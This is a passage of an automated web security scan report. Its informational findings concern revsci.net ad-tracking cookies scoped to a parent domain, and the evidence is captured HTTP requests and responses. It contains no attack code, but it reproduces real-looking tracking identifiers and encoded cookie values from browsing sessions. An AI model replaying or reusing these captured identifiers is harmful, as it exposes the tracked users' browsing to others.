Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; 
rsiPus_UVQe="MLsXrrEOpxpv55DW8tahZ2a57v6B9MeZL8/LTEv/jJaMn5vP+AaSaAp+hCNi+AtwkjW+RefXIKCFOb52VlJjrhtz/K0F0sWwzeRtpIdluxQek5zccFWsHLi2KM+ZjwDQCJV6O2MoC7r7STaLvqoiVDgloVhGO8DCKXMuP6S0vV0rRPMr+4FQiZzVfCjm2Lh/YkpRiZOeLmjUput9lWGJP3YqjHBlGcOU6aAjfq4ibjAuZaifAD12GV3MM7Os90125jNjah5Wl2JWXp3qoPuhHB9AUM9SIgkXkhFkXawqpm+PCmBL/rRLkNvRLqXizj1nhBAYelUSwkeFm7FWTh3bAW46hLZnvrDEVxxdlStZX6BLgYWkTXAr7NhngfM63uGRFwshyT0vUcCHgJHtHjwqb4gUK3U3Xlk/qfEyRIX0CYp3yLh6JdWmKGvTop06tZ57NWC7sYJivG6/XJXPh9kiLGmrABOJg0ZtLzzv+RMLBnPdhWdsfqH1YJwZA8zu9RM24LtkIq/AzoH015WS8axndbNjVCS0Jdy2g7tnbT4ibdPnWCemmw5DLKt17XfJqmkiLo4HNRYEQTYElhU3p/R3QmwWF2NkS16R2OV/GC10lX1vNK73Ft5xFtY5cXx7HXqH4NDid4ya00d1KxDbeGs2zvRtLTQCJxhQMPTkN34kd77C6G35LeJs2UWyjbLbkj1s/WgXM/d2WrgMkJc95WcpztNpB3veCMTXHtRpRP9j79S2eDr/UTmxj81QK+a4V5co3htv2qle9Hfxbq0j9sdrznUKUWJ5WYe1DlAdBsYmSOhPpIiQM0NaLNkyRwyAYAqCh7y5c4nZ6Tpo0r6KsvGwNO/t8O1yT6/GShgeyHXi1IvvZ0hstn43x+lxdVmaPuYX2sSMnPn4QKa12/fY0tPU6ddfwTD+9bgfDbO13IsHs6f5j2+r+EtZari1WX6nbA7T++lDvkLjcIrOl4601kWzvvi98b2F7OSSGvaJpJGavbpF/2BIRW/HC0h5tpMEm6W7+erhn93u1cBSkOvDoCr0GepDjUWA/1yQzlErEbvPIyhM3f4Jzt8JEyA2ePwz5BrQAUT9/dLtw8tewKVOKqP/qq9iEZ0wmdXyjf/AVeIc8f2yvlCzvSY+nfgoZk3nuvpBn+TM//Se4rR/DBpuCUDXQuA7A6XXEa7vK0oRNNNeyJKHti3Q1fiLowLkcct3KanqtvmCIU6n0kuFI6nT1Ahq/vOxwTNJbEJOQVxP2vHai7ZVs1Qa6BwHlMkcXR6E6DXWn7nbH651+v741MwSOh0TCFMQTTNGUekw4gX6f9HtRzUy5C/ACJ4xJ7a+tKlQGoDR42VY9foLr0PtTN/oCK3ykMmboo7thtABUtmg"; rsi_us_1000000="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"; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; udm_0=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; rtc_vhGG=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; rsi_segs_1000000=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; rtc_255o=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_vhGG=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_255o=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:37:29 GMT; Path=/
Set-Cookie: rtc_uvoL=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:37:29 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:37:29 GMT
Content-Length: 1269

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','D08734_70010','D08734_70118','D08734_70613','H07707_10872','D08734_72078','H07707_10950','H07707_10954','H07707_10987','
...[SNIP]...

13.65. http://pix04.revsci.net/H07707/b3/0/3/0806180/562084143.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /H07707/b3/0/3/0806180/562084143.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07707/b3/0/3/0806180/562084143.js?D=DM_LOC%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252F2011%252F05%252F03%252Fcerberus-and-partner-acquire-innkeepers-hotels%252F%26DM_CAT%3DNYTimesglobal%2520%253E%2520Business%2520%253E%2520Dealbook%26DM_EOM%3D1&C=H07707 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/cerberus-and-partner-acquire-innkeepers-hotels/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; 
rsiPus_UVQe="MLsXrrEOpxpv55DW8tahZ2a57v6B9MeZL8/LTEv/jJaMn5vP+AaSaAp+hCNi+AtwkjW+RefXIKCFOb52VlJjrhtz/K0F0sWwzeRtpIdluxQek5zccFWsHLi2KM+ZjwDQCJV6O2MoC7r7STaLvqoiVDgloVhGO8DCKXMuP6S0vV0rRPMr+4FQiZzVfCjm2Lh/YkpRiZOeLmjUput9lWGJP3YqjHBlGcOU6aAjfq4ibjAuZaifAD12GV3MM7Os90125jNjah5Wl2JWXp3qoPuhHB9AUM9SIgkXkhFkXawqpm+PCmBL/rRLkNvRLqXizj1nhBAYelUSwkeFm7FWTh3bAW46hLZnvrDEVxxdlStZX6BLgYWkTXAr7NhngfM63uGRFwshyT0vUcCHgJHtHjwqb4gUK3U3Xlk/qfEyRIX0CYp3yLh6JdWmKGvTop06tZ57NWC7sYJivG6/XJXPh9kiLGmrABOJg0ZtLzzv+RMLBnPdhWdsfqH1YJwZA8zu9RM24LtkIq/AzoH015WS8axndbNjVCS0Jdy2g7tnbT4ibdPnWCemmw5DLKt17XfJqmkiLo4HNRYEQTYElhU3p/R3QmwWF2NkS16R2OV/GC10lX1vNK73Ft5xFtY5cXx7HXqH4NDid4ya00d1KxDbeGs2zvRtLTQCJxhQMPTkN34kd77C6G35LeJs2UWyjbLbkj1s/WgXM/d2WrgMkJc95WcpztNpB3veCMTXHtRpRP9j79S2eDr/UTmxj81QK+a4V5co3htv2qle9Hfxbq0j9sdrznUKUWJ5WYe1DlAdBsYmSOhPpIiQM0NaLNkyRwyAYAqCh7y5c4nZ6Tpo0r6KsvGwNO/t8O1yT6/GShgeyHXi1IvvZ0hstn43x+lxdVmaPuYX2sSMnPn4QKa12/fY0tPU6ddfwTD+9bgfDbO13IsHs6f5j2+r+EtZari1WX6nbA7T++lDvkLjcIrOl4601kWzvvi98b2F7OSSGvaJpJGavbpF/2BIRW/HC0h5tpMEm6W7+erhn93u1cBSkOvDoCr0GepDjUWA/1yQzlErEbvPIyhM3f4Jzt8JEyA2ePwz5BrQAUT9/dLtw8tewKVOKqP/qq9iEZ0wmdXyjf/AVeIc8f2yvlCzvSY+nfgoZk3nuvpBn+TM//Se4rR/DBpuCUDXQuA7A6XXEa7vK0oRNNNeyJKHti3Q1fiLowLkcct3KanqtvmCIU6n0kuFI6nT1Ahq/vOxwTNJbEJOQVxP2vHai7ZVs1Qa6BwHlMkcXR6E6DXWn7nbH651+v741MwSOh0TCFMQTTNGUekw4gX6f9HtRzUy5C/ACJ4xJ7a+tKlQGoDR42VY9foLr0PtTN/oCK3ykMmboo7thtABUtmg"; rsi_us_1000000="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"; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=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; rtc_TX1Q=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; 
udm_0=MLvv9CEJZjpv597JwPKJxL5jdQTtJkLnfaGGH+sXeVhojk3TDdGQ48R7+bLruJ60iM7Sz5oU/MMtfVAK48Z9O6/45hHhobh/P4HBsmPoU0h5SlodRsokYWrKBhXeWhEMhpYHEPoL0KzP3EX6mZFBv9S2dirOe+Qyy4gATViu1piG4YZ7h8IYuIBweBMVCqaoaapFLQFyXwt86CZwNS/ZI2FWdSU9tZKJgdmJaVdwKcPVH+omeRzslVmcpIreii62y4609e4ruTWt7AE2biclRlljz/XkBWKA5jAg4YmqVGcKbaF6Cu6lYgxzS61ATCc+TsSYHbQaQ1b9Bs+h1g+JnvqhPRhpQ9X0T4UILyoAQ6qaTcW0y75ATMgFgVPblB4OEOs+Rn07APBf2ZHZpTJZjCRQRFadCPUUZff9Ww751+pCXbMqzxH3RYaKszrGmw6Bl4Ct/tulPpzHRX4tck+fTAi/ALopOv5wo121Ej5NzCSn35BLQTnG8v/Hkb5rho3dE4bfKB0F8OojW/LLW25gMvqy8pCPUDiUjjwIVd2JfYKiCMGfqd4xuDm3SoXlXWi3Dlgd95+TvfwAHEbVpqzZ2dJOiGbI53uuikyLW71k0ngzB8AZvzytlxan3LWtI9KLsDEIHcprGI0mdY9SUpHT5bxx++8lE5XeRgy9PKl9oYPzV18TxOcagKS3NSOdNBPwaVlx86cak5s8ds1TjvFzExJ467/tlD1ty+ys++umu5ueP6HM12z2u8KSGE9dfflBj7aCHSyO4HcghXXbNjSygKXMBMX0o5gvyaduUNMSFm1YsynfDZLjWdWG6z8xfF9KvtuoIvfyR8ivzFlHL9O/BlcJpaAUdmqA4/keMlEDeuVWtb5stFbBI5DkQgFHhtP2M+g3pxqzPHlouWGOpx2YtocD29it3JFGBItEFfDxTvrDHQvroo0ida71OC1NcxQC9OQy/XOqEJSX8RxfPeouAjoyMqhm9iYIDCK9zu/9sqzwwrgQyOWvphqvVlaowQsS7wrMADeCqdUu6+NVgO9o9XKjPMGkhgPuPIa/yihqHah+SKlO/XvClQX5MMYfZ7FRKgw6q/CP1dHLbkstqhnDmd5GVppLaNZ8l96XbeFJYXTEUzZ7A05Gh0cWCt8hXDSQ6tG2T4FA6XpVxk9n7+CCGxEPjIBFxv6Zxo5lwBeBFo7a4W2T7sLx6MvsoljB9f4Ar+LT5IKhnteI1KOCoUTmoniPnKp7BUuAMUbZ71SX7LSYEEFII4BVWgijlPQbImy3ASlt5J6Guc//o0z9oaUJT/Uh5seuNBfBl06kSXLHwN/KiYSeCNpTNy0V8sIsafkXxKnd3DSC5+SZuwyeo8wN2ZOuOHPrI62KZ7vjIfFSAYKp+cwFzUbH+KvmJ2e7kzJTI1DnL8JUMCe/MMrjdE/2Iyf6TJWMi7AnjiVPx/vbvRAW4RDo3AKJE999kwYcaRciNrO/ANzPdafxGI8WPRFgVCDLgX1vPcai

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_TX1Q=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF4jOheHIMHvC1v6FY5BAFiE2lu64fTXbwk32ILzQmufPZU63k5HlskvBlDss6IgvkSQstmQwrMQ3yY/VQb+XpGRPtPdF/P3xDi+xs9p2qFQoXaeUwOOegZxQVZYR2KCkQqCbRlwQpf87la8qMfa2fdzFQ0TyNPZLi+zmYamHuHrQfTLzzkmjbvQ4A1+qkvMUp1Q8EPIZHldrm7RX7vjzPS1hCgtBdKFT5yakB0dwEt8yy1Wy8MVYkqR3iNIjv9dBsXUpcWMrfdHafcSkz+Wc3n68tYm8zJOmCw5FgYtyhlsT30uqmQiAFF42QL7KFHW412CHpL2aQjBxEgqCMdlYnfIY/OvpEUJUEV+JwGyfUWwQJhoZ+LV5H5Od9QuH0RMsKPSeiYAFgLiciPP+HwMadiS218pIt9CDWHegko8z2NSaN8GLhXO7ZzMVTiLefN4oTccmbii8yd2ZE2dbvSQXV5HVasLLo7CabTqrU8Ftt4qPv9FgA6uVTq+DODKbhGtVKmQi8wa6soY1r8Gg1W/vbUnWhE1n0dL4+YaWZYwVgvqX4ReujuW9NpBoIOuEXclBxJGfae76mOLOhi7XB4fjMZPkXl5go/G8u2UIN6VieY6icniHpCBoG6ELfYnMSc9Qpn32GIGUS+VxTA+ZmEONEQUlCRXtJWGbSYBO3VHGdEraMclrTrPJ6SN++HietQ/6TXz3K50jGSB67S4UU+fu9My+1quNVNKXnMd4QCb7ZolUExqxCFzEvRTFjuCyf64MM3YX70AFru9LIo/V1CnNxecZnIVwAXILRiR1yiBaDruJvB3KzHQ==; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:37:13 GMT; Path=/
Set-Cookie: rtc_kb6R=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:37:13 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:37:13 GMT
Content-Length: 1269

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','D08734_70010','D08734_70118','D08734_70613','H07707_10872','D08734_72078','H07707_10950','H07707_10954','H07707_10987','
...[SNIP]...

13.66. http://pix04.revsci.net/H07707/b3/0/3/0806180/579814010.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /H07707/b3/0/3/0806180/579814010.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07707/b3/0/3/0806180/579814010.js?D=DM_LOC%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252F%26DM_CAT%3DNYTimesglobal%2520%253E%2520Business%2520%253E%2520Dealbook%26DM_REF%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252Fcategory%252Fmain-topics%252Fventure-capital%252F%26DM_EOM%3D1&C=H07707 HTTP/1.1
Host: pix04.revsci.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/
Cookie: NETID01=529777297210b0ea0bebf89fb75e37bd; udm_0=MLvv7qPvYS5npS5IdtJQSJvhPx/j4C3JXuteOzZrowSCWmqpgTbMk8TbSMyqxlmLyxECNpR02+gPiezqOi+5yDykHuJcd6JJdoqLT8+i34bQnPvlwJigh1mUBVMxT2jfIxNwiDsUjsIFhNY13veukem47waFuIaQqYRyamjEvbzrtYAFMkMLhz8IyAfDJDgGAxRmbCiIOI/di7VuccpOkCFmEfIjhk5PRY/BVcGMxjjd26Gh4r3LbiC/DDBiBEkhq8JEqKIFkLwkhRrrOal9LlyDJN56E1oZkKstcU4ls+6wuVbuB+4+40PT0qOQ8ovh6fTDhw1dZ5SWaGL6x6vGDshNHJvL1UajC5eKoBIJ2xSFpyDcj4+w77js62NAT7kEPYmvqQoshwPyf2vOCimLsUgUFNNxIGmZPYzZs4PiPM+vVu1dcss0McJQrn3DO1uknbOYHQiwl9wlvyRQm0rbkjW9LIrwSiZCNdEo0ad0FuCYBgpXiDG66lxpMUq0lKVhL3YyhyI/Oj+MuDOYFK+dW/6zM7b1mda0br2f4dGKPL3vg4qXPKYWMdCSKP0Xg355P74y; NETSEGS_H07707=d303c7ec11fd6a67&H07707&0&4df0add0&0&&4dca5d68&b4e1d2b1d00ab5a43b3cb0c8a26d04a4; rsi_segs_1000000=pUPFOEmBLwIQV+kbw/biG3iKgsa+kLk8D0ZkZeJ97Z/AoU7LFBrME41XvQUP/qg8DMnGZ9C924yoDFHB0JPh0+GLgRF8nfUqsG9IpS7I04mBNjPpQxPhVnicg4juBqIHBbyVzgakza9kMFPER9hUo+C303qHidIn2esoGFDfLFaKdyQuehDDUl4/raNV+U2czlEXgK7yGgmfEBZnc1wnbPIMt8S/bLxrtq7e+o2EMiQ0n9f5GuR+E192nuAFLhbgBqWf2xg3; rtc_OkLn=MLuB26mvt4kSQA8cBQ5Xp5GzJe3015EFoD/95teJL+E7r/9Dz2ruFLBtozaNrNCnxTv/CPBK4vxuKCe62VWohhBnMq1x/q0J22fzirjvhsYDeU2ou1Z4c7QpH/iIvZSk4jupAadTP3jJwOGhjpBlL0D/pb7eB9//K6gCqUY7F9avCH3SeUbAKZ8SaMucKXkSP0/UCmQq5H3prJ3dI4SCV2jsz357yIBJ1Wmb9VWkVixIXqd2sv4V4HAIcSCMcLipNC98B0t/No+oQiekPIcQ2jiRXxTdKUdmHxepDyCKFkkH2RhtOjE3aHseBOExJGngyl45Qk65yXrEpCHIDf6o

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_OkLn=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPNOE/FLgIMlrE7uk0efC2MxeQiIW9f4qMA3RvoIdAx3izt0WEHmQdVL0j8gwBbwYN+xoekJT0casdPYJmCnQf6nzyeTtOvbH9yibYGuaoKzy1uAlD/7oqW6csKFkxmhZaFl+jQTmZPk9GgPR9KPyda9+JvYBz/YEF3KohORRwuZK9AfFV8ozq0Uxu091hAQBZa9/Uo5+t4x1b1kdwS1q8wH7uVyQVsOiVrGSktCzfSJjwJUPNCskC+TFybfXv0; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:29:18 GMT; Path=/
Set-Cookie: rtc_61Wz=MLuB26mvt4kSQA8cBQ5Xp5GzJe3015EFoD/95teJL+Ejr//DyFLu1LNxozaNrNCnxTv/CPBK4vwUC37I+Pw2DxDH9eVMUC9zB1mGK9JGee2kZ/rkxh9ZhsvGXmyp1GIOejNCcp29JzcATN8GDRgxtWQLVIrfqXjLYkKxH2Wkot1CcCcHEV+imu9mtVtV+fEsoPqb8Sx0EexVQw7FtCen+/ihLI/zuRtzoISDJn1i335fn+91HWdFyleqRqt2FFYHQRSR0n0huHL1bBQL7IuGA/Tq/HBv4FOro1WSc6yqw+2xjgQcQAAMVLamZ29iRGSHkD6u/g3+COdPKCANLv6T; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:29:18 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:29:17 GMT
Content-Length: 1149

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70010','D08734_70105','H07707_10872','H07707_10950','H07707_10954','H07707_10987','H07707_11017','H07707_11018','H07707_10678','
...[SNIP]...

13.67. http://pix04.revsci.net/H07707/b3/0/3/0806180/590965522.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /H07707/b3/0/3/0806180/590965522.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07707/b3/0/3/0806180/590965522.js?D=DM_LOC%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252F2011%252F05%252F09%252Flinkedin-on-track-to-raise-274-million-with-ipo%252F%26DM_CAT%3DNYTimesglobal%2520%253E%2520Business%2520%253E%2520Dealbook%26DM_REF%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252Fcategory%252Fmain-topics%252Fventure-capital%252F%26DM_EOM%3D1&C=H07707 HTTP/1.1
Host: pix04.revsci.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/09/linkedin-on-track-to-raise-274-million-with-ipo/
Cookie: NETID01=529777297210b0ea0bebf89fb75e37bd; udm_0=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; NETSEGS_H07707=d303c7ec11fd6a67&H07707&0&4df0add0&0&&4dca5d68&b4e1d2b1d00ab5a43b3cb0c8a26d04a4; rsi_segs_1000000=pUPNOEPB7nMMVp94u+yf1fTHFbylf3xSUCqJEEpv7LJlsjeftNd84I1oDZUZb5s27D2NJeZFLT6oXpt5CdiNqhnlw6eTql12Ct5+Oz6IeSkY982gI6j53rDQzcuqBf6kPQdewU4q16oSlJFrIakI2hzJAfgXe29x5XkG204nL/YwlM2S9arSbEJumSD5+DO7Yrw4YrZT9Vx1PbHmVtjWc3BhjZkHqNNtsGgFH+DLaC/r8YaJFy/Cfwl8hJitFEs=; rtc_jd7T=MLuB26mvt4kSQA8cBQ5Xp5GzJe3015EFoD/95teJL+Err//DyFLu1LNxozaNrNCnxTv/CPBK4vwUC37I+Pw2DxDH9eVMUC9zB1mGK9JGee2kZ/rkxh9ZhsvGXmyp1GIOejNCcp29JzcATN8GDRgxtWQLVIrfqXjLYkKxH2Wkot1CcCcHEV+imu9mtVtV+fEsoPqb8Sx0EexVQw7FtCen+/ihLI/zuRtzoISDJn1i335fn+91HWdFyleqRqt2FFYHQRSR0n0huHL1bBQL7IuGA/Tq/HBv4FOro1WSc6yqw+2xjgQcQAAMVLamZ29iRGSHkD6u/g3+COdPKCC+G/59

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_jd7T=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFOEOhLgIQF/Ubw+6yiFgTmgYBdHsoJiWBBGBKsZM+kKb4NfzIzHN3SvzuFM7006496nYKZH0mewDwK4ZCtLhZXv/YmkG2JIDYc5RsuanPlKJnMTbfNOG8YkPsOtQtNuOpcPqOxFvSJgEUWankYFT2Yl9LQnW3TL6UALkyQtEqFGcKcNskrzJcBYSe/+A4gtAzKS/lFfknOREWCvgghmsmmU2RiSJrCml7kKegC4UNNRUpLiLgNEugSSIf9TomIrj+ABg1; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:28:20 GMT; Path=/
Set-Cookie: rtc_D0S9=MLuB26mvt4kSQA8cBQ5Xp5GzJe3015EFoD/95teJL+E7r/9Dz2ruFLBtozaNrNCnxTv/CPBK4vxuKCe62VWohhBnMq1x/q0J22fzirjvhsYDeU2ou1Z4c7QpH/iIvZSk4jupAadTP3jJwOGhjpBlL0D/pb7eB9//K6gCqUY7F9avCH3SeUbAKZ8SaMucKXkSP0/UCmQq5H3prJ3dI4SCV2jsz357yIBJ1Wmb9VWkVixIXqd2sv4V4HAIcSCMcLipNC98B0t/No+oQiekPIcQ2jiRXxTdKUdmHxepDyCKFkkH2RhtOjE3aHseBOExJGngyl45Qk65yXrEpCHIDf6o; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:28:20 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:28:19 GMT
Content-Length: 1149

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70010','D08734_70105','H07707_10872','H07707_10950','H07707_10954','H07707_10987','H07707_11017','H07707_11018','H07707_10678','
...[SNIP]...

13.68. http://pix04.revsci.net/H07707/b3/0/3/0806180/702365539.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /H07707/b3/0/3/0806180/702365539.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

